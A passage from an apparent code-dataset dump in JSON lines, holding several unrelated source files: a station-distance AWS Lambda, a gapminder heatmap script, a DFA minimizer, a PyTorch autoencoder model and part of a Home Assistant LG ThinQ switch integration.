"homeassistant.const.STATE_IDLE", "line_number": 123, "usage_type": "argument"}, {"api_name": "homeassistant.const.STATE_PLAYING", "line_number": 132, "usage_type": "argument"}, {"api_name": "homeassistant.const.STATE_PAUSED", "line_number": 141, "usage_type": "argument"}]} +{"seq_id": "26206341834", "text": "\"\"\"\nDer selbe Code wie \"lambda_function.py\" nur das hier mit der DDB gearbeitet wird.\n\"\"\"\n\nimport math\nimport json\nimport boto3\n\ndef calculate_distance(lat1, lon1, lat2, lon2):\n # Umrechnung in Radianten\n lat1 = math.radians(lat1)\n lon1 = math.radians(lon1)\n lat2 = math.radians(lat2)\n lon2 = math.radians(lon2)\n\n # Formel zur Berechnung der Entfernung\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2) ** 2\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n distance = 6371 * c # Radius der Erde in Kilometern\n\n return round(distance)\n\ndef read_dynamodb_table(table_name):\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table(table_name)\n\n response = table.scan()\n items = response['Items']\n\n while 'LastEvaluatedKey' in response:\n response = table.scan(ExclusiveStartKey=response['LastEvaluatedKey'])\n items.extend(response['Items'])\n\n return items\n\ndef lambda_handler(event, context):\n from_station = event['pathParameters']['from_station']\n to_station = event['pathParameters']['to_station']\n\n table_name = 'db_table'\n dynamodb_data = read_dynamodb_table(table_name)\n\n from_station_data = next((item for item in dynamodb_data if item['DS100'] == from_station), None)\n to_station_data = next((item for item in dynamodb_data if item['DS100'] == to_station), None)\n\n if from_station_data and to_station_data:\n distance = calculate_distance(from_station_data['Latitude'], from_station_data['Longitude'],\n to_station_data['Latitude'], to_station_data['Longitude'])\n response = {\n \"from\": from_station_data['NAME'],\n \"to\": to_station_data['NAME'],\n \"distance\": distance,\n \"unit\": \"km\"\n }\n else:\n response = {\n \"message\": \"One or both stations not found\"\n }\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps(response)\n }\n", "repo_name": "Fabs2210/db_distance_calc", "sub_path": "app/dynamodb_app/lambda_function_ddb.py", "file_name": "lambda_function_ddb.py", "file_ext": "py", "file_size_in_byte": 2045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.radians", "line_number": 11, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 12, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 13, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 14, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 19, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 19, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 20, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 20, "usage_type": "call"}, {"api_name": "boto3.resource", "line_number": 26, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "40518336111", "text": "from matplotlib import pyplot\nimport pandas as pd\nimport seaborn as sns\nurl = 'https://raw.githubusercontent.com/resbaz/r-novice-gapminder-files/master/data/gapminder-FiveYearData.csv'\ndf1 = pd.read_csv(url)\nprint(df1)\ndf1.to_csv('Dataset.csv',index=False)\ndf2 = pd.pivot_table(df1,values='lifeExp',index='continent',columns='year')\nprint(df2)\npyplot.figure(figsize=(15,10))# width by height\n# This shows the average life expectancy for each year\nsns.heatmap(df2,annot=True,fmt=\".2f\").get_figure().savefig('Seaborn_HeatMap.png')\n", "repo_name": "mrUnlimited2020/HeatMap-plot", "sub_path": "heatmap.py", "file_name": "heatmap.py", "file_ext": "py", "file_size_in_byte": 529, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "pandas.pivot_table", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "13055074316", "text": "import matplotlib.pyplot as mplt\nimport numpy as np\n\n# Task 1\nx = np.arange(0, 21)\nprint(x)\n\nmy_mean = np.mean(x)\nprint(\"The mean is \", my_mean)\n\nmy_std = np.std(x)\nprint(\"The standard deviation is \", my_std)\n\nvari = np.var(x)\nprint(\"The variance of the marks is \", vari)\n\n# Task 2 - Histogram\nnums = [0.5, 0.7, 1, 1.2, 1.3, 2.1]\nbins = [0, 1, 2, 3]\nx_pos = [i for i, _ in enumerate(nums)]\nmplt.hist(x_pos, bins, color='gold')\nmplt.xlabel(\"Amount of Numbers\")\nmplt.ylabel(\"Amount of Bins\")\nmplt.title(\"Numbers against the bins\")\nmplt.xticks(x_pos, nums)\nmplt.show()\n", "repo_name": "jordan-hess/machine-learning-challenge", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 567, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.arange", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "30230172869", "text": "import networkx as nx\nfrom graphviz import Source\nfrom graphviz import Digraph\n\nfrom Automata import Automata\n\n\ndef get_key (dict, value):\n return [k for k, v in dict.items() if v == value]\n\nclass DFA:\n\n def __init__(self):\n self.states = set() ## 状态集合\n self.start_state = 0 ## 起始状态集合\n self.final_states = set() ## 终止状态集合\n self.transitions = {} ## 状态转移矩阵\n self.alphabet = set() ## 可接受的字符\n\n def add_state(self, state):\n self.states.add(state)\n\n def add_start_state(self, state):\n self.start_state = state\n\n def add_final_state(self, state):\n self.final_states.add(state)\n\n def add_symbol(self, symbol):\n self.alphabet.add(symbol)\n\n def add_transition(self, f_state, symbol, t_state):\n if f_state not in self.transitions:\n self.transitions.update({f_state: {}})\n\n if t_state not in self.transitions[f_state]:\n self.transitions[f_state].update({t_state: set()})\n\n self.transitions[f_state][t_state].add(symbol)\n\n def print(self):\n print(\"States:\", self.states)\n print(\"Start State:\", self.start_state)\n print(\"Final States:\", self.final_states)\n print(\"Transitions:\", self.transitions)\n print(\"Alphabet:\", self.alphabet)\n\n def draw(self, filename=None):\n # 实例化一个Digraph对象(有向图),name:生成的图片的图片名,format:生成的图片格式\n G = Digraph(name=\"DFA\", comment=\"test\", format=\"png\")\n for i in self.states:\n if i in self.final_states:\n s = 'doublecircle'\n else:\n s = 'circle'\n if i == self.start_state:\n f = 'green'\n else:\n f = 'gray'\n # s = 'doublecircle' if i in self.final_states else 'circle'\n # f = 'grey' if i == self.start_state else 'green'\n G.node(name = str(i),label = str(i),color = f,shape = s)\n # G.add_node(i, shape=s, fillcolor=f, style='filled')\n \n\n for i, d in self.transitions.items():\n for k, v in d.items():\n l = ','.join(v)\n G.edge(str(i), str(k), label=l)\n print(G.source)\n \n # 画图,filename:图片的名称,若无filename,则使用Digraph对象的name,默认会有gv后缀\n # directory:图片保存的路径,默认是在当前路径下保存\n # G.view(filename=\"DFA\")\n \n # 跟view一样的用法(render跟view选择一个即可),一般用render生成图片,不使用view=True,view=True用在调试的时候\n G.render(filename='DFA',view=True)\n \n ## 这个函数是用来找到最小划分的\n def hopcroft(self):\n P = [ self.final_states, self.states.difference(self.final_states) ]\n ## P一开始是起始态和终止态的划分,最后经过迭代变成最终的划分\n W = [ self.final_states ]\n\n while len(W) > 0:\n A = W.pop() ## 注意这东西pop出来的是一个set\n \n for c in self.alphabet:\n X = set()\n for f_state, t_state in self.transitions.items():\n ## f是起始状态,t是接受字母,以及接受字母后跳转到的状态,一个f可能有多个t\n for k, s in t_state.items():\n if c in s and k in A:\n X.update(set([f_state]))\n ## update方法是合并集合\n ## 如果存在一个字母表中的字符使得这个状态接受这个字符后跳到终态,那么将这个状态合并进X\n ## X是接受一个字符可以到终态的集合\n\n for Y in P:\n if X.intersection(Y) != set() and Y.difference(X) != set():\n ## 当现在的分解的list中存在一个set,以及字母表中的一个元素,使得这个set经过这个元素\n ## 后,跳转到的状态的集合不全在分解的集合的子集中,就把Y分解,重新加入结果集\n P.append(X.intersection(Y))\n P.append(Y.difference(X))\n P.remove(Y)\n\n ## 之后我们还需要更新W\n if Y in W:\n W.append(X.intersection(Y))\n W.append(Y.difference(X))\n W.remove(Y)\n else:\n if len(X.intersection(Y)) <= len(Y.difference(X)):\n W.append(X.intersection(Y))\n else:\n W.append(Y.difference(X))\n # print('hopcroft', P)\n ## 通过这个算法,可以产出最小化划分\n return P\n\n def minimize(self):\n min_states = self.hopcroft()\n print(\"min_states\",min_states)\n for state_set in min_states:\n ## state_set是一个set\n\n if len(state_set) > 1:\n min_state = min(state_set)\n ## 以set中最小的作为化简后的DFA的新的状态\n for state in state_set:\n if(self.transitions.__contains__(state)):\n ## state是一个数\n # print(\"state\", state)\n # print(\"1\", self.transitions[state])\n # # print(\"2\", type(self.transitions[min_state]))\n # print(\"2\", self.transitions[min_state])\n # print(\"3\", self.transitions)\n self.transitions[min_state].update(self.transitions[state])\n ## 更新化简后的DFA的新的状态的状态转移矩阵中的一条记录\n ## transitions是个三元组\n if state != min_state:\n self.transitions.pop(state)\n self.states.discard(state)\n changes = []\n for s, _ in self.transitions.items():\n for t, _ in self.transitions[s].items():\n if t in state_set and t != min_state:\n changes.append((t, s))\n ## 我们之前将新状态用原来状态的组合中的最小的代替,所以状态转移中需要添加上,没有被\n ## 代替的状态到其他状态的跳转\n \n for t, s in changes:\n self.transitions[s][min_state] = self.transitions[s].pop(t)\n\n if self.start_state in state_set:\n self.start_state = min_state\n \n changes = []\n for fs in self.final_states:\n if fs in state_set:\n changes.append(fs)\n\n for s in changes:\n self.final_states.discard(fs)\n \n ## DFA代码化\n def DFACode(self,variables,word=''):\n res = \"\"\n t_tmp=''\n result=[]\n for i in range(len(variables)):\n if variables[i] not in self.alphabet:\n print(\"error\")\n result.append('error')\n break\n if i == 0:\n s = {variables[i]}\n # temp是初态接受这个字母到达的状态的集合,是list\n temp = get_key(self.transitions[self.start_state],s)\n if len(temp) == 0:\n print(\"error\")\n result.append('error')\n break\n else:\n t_tmp = temp[0]\n # print(t_tmp)\n else:\n s = {variables[i]}\n # print(s)\n # print(t_tmp)\n # temp是初态接受这个字母到达的状态的集合,是list\n temp = get_key(self.transitions[t_tmp],s)\n if len(temp) == 0:\n print(\"error\")\n result.append('error')\n t_tmp=0\n break\n else:\n t_tmp = temp[0]\n # if(t_tmp in self.final_states):\n # res+=variables[i]\n # print(t_tmp)\n if t_tmp in self.final_states:\n if(word!='' and 'K' in variables):\n res='<'+'Keyword,'+word+'>'\n elif(word==''):\n if(variables=='×'):\n variables='*'\n elif(variables=='{'):\n variables='('\n elif(variables=='}'):\n variables=')'\n res='<'+variables+'>'\n else:\n res = \"<\" + \"Var,\" + word + \">\"\n result.append(res)\n print(res)\n return result\n\n @staticmethod\n def generateDFA(dfa:Automata):\n dfa_1=DFA()\n dfa_1.states = dfa.states\n dfa_1.start_state = dfa.start_states\n dfa_1.final_states = dfa.final_states\n dfa_1.transitions = dfa.transitions\n dfa_1.alphabet = dfa.alphabet\n\n return dfa_1\n\n \n \n", "repo_name": "FanqingM/Compilation-principle", "sub_path": "minimizer.py", "file_name": "minimizer.py", "file_ext": "py", "file_size_in_byte": 9352, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "graphviz.Digraph", "line_number": 50, "usage_type": "call"}, {"api_name": "Automata.Automata", "line_number": 221, "usage_type": "name"}]} +{"seq_id": "27139338751", "text": "import numpy as np\r\nimport torch\r\nimport os\r\nfrom collections import OrderedDict\r\nfrom torch.autograd import Variable\r\nimport util.util as util\r\nfrom .base_model import BaseModel\r\nfrom . import networks\r\nfrom .losses import init_loss\r\nimport torch.nn.functional as F\r\nfrom .introvae import *\r\n\r\nimport pdb\r\n\r\n\r\ntry:\r\n\txrange # Python2\r\nexcept NameError:\r\n\txrange = range # Python 3\r\n\r\nclass ConditionalGAN(BaseModel):\r\n\tdef name(self):\r\n\t\treturn 'ConditionalGANModel'\r\n\r\n\tdef initialize(self, opt):\r\n\t\tself.opt = opt\r\n\t\tBaseModel.initialize(self, opt)\r\n\t\tself.isTrain = opt.isTrain\r\n\t\t# define tensors\r\n\t\tself.input_A = self.Tensor(opt.batchSize, opt.input_nc,\r\n\t\t\t\t\t\t\t\t opt.fineSize, opt.fineSize)\r\n\t\tself.input_B = self.Tensor(opt.batchSize, opt.output_nc,\r\n\t\t\t\t\t\t\t\t opt.fineSize, opt.fineSize)\r\n\r\n\t\t# load/define networks\r\n\t\t# Temp Fix for nn.parallel as nn.parallel crashes oc calculating gradient penalty\r\n\t\tuse_parallel = 0\r\n\r\n\t\tif opt.which_model_netG == 'introAE':\r\n\t\t\tstr_to_list = lambda x: [int(xi) for xi in x.split(',')]\r\n\t\t\tself.netG = IntroAE(norm=opt.norm, gpuId = opt.gpu_ids,cdim=3, hdim=opt.hdim, channels=str_to_list(opt.channels), image_size=opt.output_height)\r\n\t\t\tself.old_lr = opt.lr\r\n\t\t\tif len(opt.gpu_ids) > 0:\r\n\t\t\t\tself.netG.cuda(opt.gpu_ids[0])\r\n\t\t\tif not self.isTrain or opt.continue_train:\r\n\t\t\t\tself.load_network(self.netG.encoder, 'G_Encoder1', opt.which_epoch)\r\n\t\t\t\tself.load_network(self.netG.decoder, 'G_Decoder', opt.which_epoch)\r\n\t\t\tself.optimizer_G_E1 = optim.Adam(self.netG.encoder.parameters(), lr=opt.lr)\r\n\t\t\tself.optimizer_G_D = optim.Adam(self.netG.decoder.parameters(), lr=opt.lr)\r\n\t\t\tself.contentLoss = init_loss(opt, self.Tensor)\r\n\t\t\tprint('---------- Networks initialized -------------')\r\n\t\t\tnetworks.print_network(self.netG.encoder)\r\n\t\t\tnetworks.print_network(self.netG.decoder)\r\n\t\t\tprint('-----------------------------------------------')\t\r\n\t\t\r\n\t\telse:\r\n\t\t\traise ValueError('This repo only support the autoencoder modified from introAE, i.e., opt.which_model_netG == introAE. \\\r\n\t\t\tBut you can use this option to add new model')\r\n\r\n\tdef set_input(self, input):\r\n\t\tAtoB = self.opt.which_direction == 'AtoB'\r\n\t\tinput_A = input['A' if AtoB else 'B']\t# projection image\r\n\t\tinput_B = input['B' if AtoB else 'A']\t# gt\r\n\t\tself.input_A.resize_(input_A.size()).copy_(input_A)\r\n\t\tself.input_B.resize_(input_B.size()).copy_(input_B)\r\n\t\tself.image_paths = input['A_paths' if AtoB else 'B_paths']\r\n\r\n\tdef validation(self):\r\n\t\tif self.opt.which_model_netG == 'introAE':\r\n\t\t\twith torch.no_grad():\r\n\t\t\t\tself.real_A = torch.autograd.Variable(self.input_A)\r\n\t\t\t\tself.real_B = torch.autograd.Variable(self.input_B)\r\n\t\t\t\tself.netG.eval()\r\n\t\t\t\tself.latent, self.fake_B = self.netG(self.real_B)\r\n\t\t\t\tself.fake_B = self.fake_B.detach()\r\n\t\t\t\tself.latent = self.latent.detach()\r\n\r\n\t\t\t\tself.loss_G_Content = self.contentLoss.get_loss(self.fake_B, self.real_B)\r\n\t\t\t\tself.loss_G_L1 = self.contentLoss.get_l1loss(self.fake_B, self.real_B)\r\n\t\t\t\tself.loss_G_L2 = self.contentLoss.get_mseloss(self.fake_B, self.real_B)\r\n\t\telse:\r\n\t\t\traise ValueError('This repo only support the autoencoder modified from introAE, i.e., opt.which_model_netG == introAE. \\\r\n\t\t\tBut you can use this option to add new model')\r\n\r\n\tdef forward(self):\r\n\t\tself.netG.train()\r\n\t\tgpu_ids = self.opt.gpu_ids\r\n\t\tself.real_A = Variable(self.input_A)\r\n\t\tself.real_B = Variable(self.input_B)\r\n\t\tif self.opt.which_model_netG == 'introAE':\r\n\t\t\tself.latent, self.fake_B = self.netG(self.real_A)\r\n\t\telse:\r\n\t\t\traise ValueError('This repo only support the autoencoder modified from introAE, i.e., opt.which_model_netG == introAE. \\\r\n\t\t\tBut you can use this option to add new model')\r\n\r\n\t# get image paths\r\n\tdef get_image_paths(self):\r\n\t\treturn self.image_paths\r\n\r\n\tdef optimize_parameters(self):\r\n\t\tif self.opt.which_model_netG == 'introAE':\r\n\t\t\tself.forward()\r\n\t\t\tself.loss_G_Content = self.contentLoss.get_loss(self.fake_B, self.real_B)\r\n\t\t\tself.loss_G_L1 = self.contentLoss.get_l1loss(self.fake_B, self.real_B)\r\n\t\t\tself.loss_G_L2 = self.contentLoss.get_mseloss(self.fake_B, self.real_B)\r\n\t\t\tself.loss_G = self.loss_G_L1*0.001 + self.loss_G_Content*5\t# only use L1 and perceptual loss\r\n\t\t\tself.optimizer_G_E1.zero_grad()\r\n\t\t\tself.optimizer_G_D.zero_grad()\r\n\t\t\tself.loss_G.backward()\r\n\t\t\tself.optimizer_G_E1.step()\r\n\t\t\tself.optimizer_G_D.step()\r\n\t\telse:\r\n\t\t\traise ValueError('This repo only support the autoencoder modified from introAE, i.e., opt.which_model_netG == introAE. \\\r\n\t\t\tBut you can use this option to add new model')\r\n\r\n\tdef get_current_errors_ae(self):\r\n\t\treturn OrderedDict([('AE_Loss', self.loss_AE.data[0])\r\n\t\t\t\t\t\t\t])\r\n\r\n\tdef get_current_errors(self):\r\n\t\treturn OrderedDict([('G_percetual No', self.loss_G_Content.item()),\r\n\t\t\t\t\t\t\t('G_L1 *1', self.loss_G_L1.item()),\r\n\t\t\t\t\t\t\t('G_L2 *1000', self.loss_G_L2.item())\r\n\t\t\t\t\t\t\t])\r\n\r\n\tdef get_current_errors_val(self):\r\n\t\treturn OrderedDict([\r\n\t\t\t('G_percetual_val', self.loss_G_Content.item()),\r\n\t\t\t('G_L1_val', self.loss_G_L1.item()),\r\n\t\t\t('G_L2_val', self.loss_G_L2.item())\r\n\t\t\t\t\t\t\t\t])\r\n\r\n\tdef get_current_visuals(self):\r\n\t\treal_A = util.tensor2im(self.real_A.data)\r\n\t\tfake_B = util.tensor2im(self.fake_B.data)\r\n\t\treal_B = util.tensor2im(self.real_B.data)\r\n\t\treturn OrderedDict([('Blurred_Train', real_A), ('Restored_Train', fake_B), ('Sharp_Train', real_B)])\r\n\r\n\r\n\tdef save(self, label):\r\n\t\tif self.opt.which_model_netG == 'introAE':\r\n\t\t\tself.save_network(self.netG.decoder, 'G_Decoder', label, self.gpu_ids)\r\n\t\t\tself.save_network(self.netG.encoder, 'G_Encoder1', label, self.gpu_ids)\r\n\t\telse:\r\n\t\t\traise ValueError('This repo only support the autoencoder modified from introAE, i.e., opt.which_model_netG == introAE. \\\r\n\t\t\tBut you can use this option to add new model')\r\n\r\n\tdef update_learning_rate(self):\r\n\t\tlrd = self.opt.lr / self.opt.niter_decay\r\n\t\tlr = self.old_lr - lrd\r\n\t\tfor param_group in self.optimizer_G_E1.param_groups:\r\n\t\t\tparam_group['lr'] = lr\r\n\t\tfor param_group in self.optimizer_G_D.param_groups:\r\n\t\t\tparam_group['lr'] = lr\r\n\t\tprint('update learning rate: %f -> %f' % (self.old_lr, lr))\r\n\t\tself.old_lr = lr\r\n", "repo_name": "ruixv/NLOS-OT", "sub_path": "step1/models/conditional_gan_model.py", "file_name": "conditional_gan_model.py", "file_ext": "py", "file_size_in_byte": 6079, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "52", "api": [{"api_name": "base_model.BaseModel", "line_number": 21, "usage_type": "name"}, {"api_name": "base_model.BaseModel.initialize", "line_number": 27, "usage_type": "call"}, {"api_name": "base_model.BaseModel", "line_number": 27, "usage_type": "name"}, {"api_name": "losses.init_loss", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 89, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 117, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 121, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 127, "usage_type": "call"}, {"api_name": "util.util.tensor2im", "line_number": 134, "usage_type": "call"}, {"api_name": "util.util", "line_number": 134, "usage_type": "name"}, {"api_name": "util.util.tensor2im", "line_number": 135, "usage_type": "call"}, {"api_name": "util.util", "line_number": 135, "usage_type": "name"}, {"api_name": "util.util.tensor2im", "line_number": 136, "usage_type": "call"}, {"api_name": "util.util", "line_number": 136, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "15805330235", "text": "# REQUIREMENTS = ['wideq']\n# DEPENDENCIES = ['smartthinq']\n\nimport logging\nfrom datetime import timedelta\n\nfrom .wideq.device import (\n STATE_OPTIONITEM_OFF,\n STATE_OPTIONITEM_ON,\n WM_DEVICE_TYPES,\n DeviceType,\n)\nfrom .wideq import (\n FEAT_ECOFRIENDLY,\n FEAT_EXPRESSFRIDGE,\n FEAT_EXPRESSMODE,\n FEAT_ICEPLUS,\n)\n\nfrom homeassistant.components.switch import (\n DOMAIN as SENSOR_DOMAIN,\n SwitchEntity,\n)\n\nfrom homeassistant.const import (\n STATE_ON,\n STATE_OFF,\n)\nfrom homeassistant.helpers.update_coordinator import CoordinatorEntity\n\nfrom .const import DOMAIN, LGE_DEVICES\nfrom . import LGEDevice\n\n# switch definition\nATTR_SWITCH_NAME = \"switch_name\"\nATTR_ICON = \"icon\"\nATTR_DEVICE_CLASS = \"device_class\"\nATTR_VALUE_FEAT = \"value_feat\"\nATTR_VALUE_FN = \"value_fn\"\nATTR_TURN_OFF_FN = \"turn_off_fn\"\nATTR_TURN_ON_FN = \"turn_on_fn\"\nATTR_AVAILABLE_FN = \"available_fn\"\nATTR_ENABLED = \"enabled\"\n\n# general sensor attributes\nATTR_POWER_OFF = \"power_off\"\n\nSTATE_LOOKUP = {\n STATE_OPTIONITEM_OFF: STATE_OFF,\n STATE_OPTIONITEM_ON: STATE_ON,\n}\n\nDEFAULT_ICON = \"def_icon\"\n\nSCAN_INTERVAL = timedelta(seconds=120)\n\n_LOGGER = logging.getLogger(__name__)\n\nDEVICE_ICONS = {\n DeviceType.WASHER: \"mdi:washing-machine\",\n DeviceType.DRYER: \"mdi:tumble-dryer\",\n DeviceType.STYLER: \"mdi:palette-swatch-outline\",\n DeviceType.DISHWASHER: \"mdi:dishwasher\",\n DeviceType.REFRIGERATOR: \"mdi:fridge-outline\",\n DeviceType.RANGE: \"mdi:stove\",\n}\n\nWASH_DEV_SWITCH = {\n ATTR_POWER_OFF: {\n ATTR_SWITCH_NAME: \"Power off\",\n # ATTR_ICON: DEFAULT_ICON,\n # ATTR_DEVICE_CLASS: None,\n ATTR_VALUE_FN: lambda x: x._power_on,\n ATTR_TURN_OFF_FN: lambda x: x._api.device.power_off(),\n ATTR_ENABLED: True,\n },\n}\n\nREFR_DEV_SWITCH = {\n FEAT_ECOFRIENDLY: {\n ATTR_SWITCH_NAME: \"Eco friendly\",\n ATTR_ICON: \"mdi:gauge-empty\",\n ATTR_VALUE_FEAT: FEAT_ECOFRIENDLY,\n ATTR_TURN_OFF_FN: lambda x: x._api.device.set_eco_friendly(False),\n ATTR_TURN_ON_FN: lambda x: x._api.device.set_eco_friendly(True),\n ATTR_ENABLED: True,\n },\n FEAT_EXPRESSFRIDGE: {\n ATTR_SWITCH_NAME: \"Express fridge\",\n ATTR_ICON: \"mdi:coolant-temperature\",\n ATTR_VALUE_FEAT: FEAT_EXPRESSFRIDGE,\n ATTR_TURN_OFF_FN: lambda x: x._api.device.set_express_fridge(False),\n ATTR_TURN_ON_FN: lambda x: x._api.device.set_express_fridge(True),\n ATTR_AVAILABLE_FN: lambda x: x._api.device.set_values_allowed,\n ATTR_ENABLED: True,\n },\n FEAT_EXPRESSMODE: {\n ATTR_SWITCH_NAME: \"Express mode\",\n ATTR_ICON: \"mdi:snowflake\",\n ATTR_VALUE_FEAT: FEAT_EXPRESSMODE,\n ATTR_TURN_OFF_FN: lambda x: x._api.device.set_express_mode(False),\n ATTR_TURN_ON_FN: lambda x: x._api.device.set_express_mode(True),\n ATTR_AVAILABLE_FN: lambda x: x._api.device.set_values_allowed,\n ATTR_ENABLED: True,\n },\n FEAT_ICEPLUS: {\n ATTR_SWITCH_NAME: \"Ice plus\",\n ATTR_ICON: \"mdi:snowflake\",\n ATTR_VALUE_FEAT: FEAT_ICEPLUS,\n ATTR_TURN_OFF_FN: lambda x: x._api.device.set_ice_plus(False),\n ATTR_TURN_ON_FN: lambda x: x._api.device.set_ice_plus(True),\n ATTR_AVAILABLE_FN: lambda x: x._api.device.set_values_allowed,\n ATTR_ENABLED: True,\n },\n}\n\n\ndef _feature_exist(lge_device, switch_def):\n \"\"\"Check if a switch exist for device.\"\"\"\n if ATTR_VALUE_FN in switch_def:\n return True\n\n if ATTR_VALUE_FEAT in switch_def:\n feature = switch_def[ATTR_VALUE_FEAT]\n for feat_name in lge_device.available_features.keys():\n if feat_name == feature:\n return True\n\n return False\n\n\nasync def async_setup_entry(hass, config_entry, async_add_entities):\n \"\"\"Set up the LGE switch.\"\"\"\n _LOGGER.info(\"Starting LGE ThinQ switch...\")\n\n lge_switch = []\n entry_config = hass.data[DOMAIN]\n lge_devices = entry_config.get(LGE_DEVICES)\n if not lge_devices:\n return\n\n # add wash devices\n wash_devices = []\n for dev_type, devices in lge_devices.items():\n if dev_type in WM_DEVICE_TYPES:\n wash_devices.extend(devices)\n\n lge_switch.extend(\n [\n LGESwitch(lge_device, def_id, definition)\n for def_id, definition in WASH_DEV_SWITCH.items()\n for lge_device in wash_devices\n if _feature_exist(lge_device, definition)\n ]\n )\n\n # add refrigerators\n lge_switch.extend(\n [\n LGESwitch(lge_device, def_id, definition)\n for def_id, definition in REFR_DEV_SWITCH.items()\n for lge_device in lge_devices.get(DeviceType.REFRIGERATOR, [])\n if _feature_exist(lge_device, definition)\n ]\n )\n\n async_add_entities(lge_switch)\n\n\nclass LGESwitch(CoordinatorEntity, SwitchEntity):\n def __init__(\n self,\n device: LGEDevice,\n def_id,\n definition,\n ):\n \"\"\"Initialize the switch.\"\"\"\n super().__init__(device.coordinator)\n self._api = device\n self._name_slug = device.name\n self._def_id = def_id\n self._def = definition\n self._name = None\n\n @property\n def should_poll(self) -> bool:\n \"\"\"Return True if entity has to be polled for state.\n\n We overwrite coordinator property default setting because we need\n to poll to avoid the effect that after changing a climate settings\n it is immediately set to prev state. The async_update method here\n do nothing because the real update is performed by coordinator.\n \"\"\"\n return True\n\n async def async_update(self) -> None:\n \"\"\"Update the entity.\n\n This is a fake update, real update is done by coordinator.\n \"\"\"\n return\n\n @property\n def entity_registry_enabled_default(self) -> bool:\n \"\"\"Return if the entity should be enabled when first added to the entity registry.\"\"\"\n return self._def.get(ATTR_ENABLED, False)\n\n @property\n def name(self) -> str:\n \"\"\"Return the name of the sensor.\"\"\"\n if not self._name:\n name = None\n if ATTR_VALUE_FEAT in self._def:\n feat_key = self._def[ATTR_VALUE_FEAT]\n feat_name = self._api.available_features.get(feat_key)\n if feat_name and feat_name != feat_key:\n name = feat_name.replace(\"_\", \" \").capitalize()\n if not name:\n name = self._def[ATTR_SWITCH_NAME]\n self._name = f\"{self._name_slug} {name}\"\n return self._name\n\n @property\n def unique_id(self) -> str:\n \"\"\"Return a unique ID.\"\"\"\n return f\"{self._api.unique_id}-{self._def_id}-switch\"\n\n @property\n def device_class(self):\n \"\"\"Return device class.\"\"\"\n return self._def.get(ATTR_DEVICE_CLASS)\n\n @property\n def icon(self):\n \"\"\"Return the icon to use in the frontend, if any.\"\"\"\n icon = self._def.get(ATTR_ICON)\n if not icon:\n return None\n if icon == DEFAULT_ICON:\n icon = DEVICE_ICONS.get(self._api.type)\n return icon\n\n @property\n def is_on(self):\n \"\"\"Return the state of the switch.\"\"\"\n ret_val = self._get_sensor_state()\n if ret_val is None:\n return False\n if isinstance(ret_val, bool):\n return ret_val\n if ret_val == STATE_ON:\n return True\n state = STATE_LOOKUP.get(ret_val, STATE_OFF)\n return state == STATE_ON\n\n @property\n def available(self) -> bool:\n \"\"\"Return True if entity is available.\"\"\"\n is_avail = True\n if ATTR_AVAILABLE_FN in self._def:\n is_avail = 